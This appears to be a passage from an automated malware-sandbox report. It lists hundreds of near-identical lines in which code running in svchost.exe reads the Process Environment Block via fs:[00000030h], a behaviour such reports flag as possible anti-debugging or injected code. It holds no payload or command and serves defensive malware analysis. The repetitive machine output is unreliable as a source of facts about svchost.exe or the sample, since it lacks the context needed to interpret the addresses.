Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]	2_2_034B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]	2_2_034663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]	2_2_0350625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]	2_2_0342A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]	2_2_03436259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]	2_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]	2_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]	2_2_0342826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]	2_2_0342823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]	2_2_035062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]	2_2_0342C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]	2_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]	2_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]	2_2_034F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]	2_2_03460124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]	2_2_035061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]	2_2_034601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]	2_2_03470185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]	2_2_03432050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]	2_2_034B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]	2_2_0345C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]	2_2_034B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]	2_2_0342A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]	2_2_0342C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]	2_2_034C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]	2_2_034B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0342A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]	2_2_034380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]	2_2_034B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0342C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]	2_2_034720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]	2_2_0343208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]	2_2_034280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]	2_2_034C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]	2_2_03430750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]	2_2_034BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]	2_2_034B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]	2_2_03438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]	2_2_0346C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]	2_2_03430710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]	2_2_03460710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]	2_2_034AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]	2_2_034B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_034BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]	2_2_034D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]	2_2_034307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]	2_2_034E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]	2_2_0344C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]	2_2_03462674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]	2_2_034AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]	2_2_03472619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]	2_2_0344E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]	2_2_03466620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]	2_2_03468620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]	2_2_0343262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
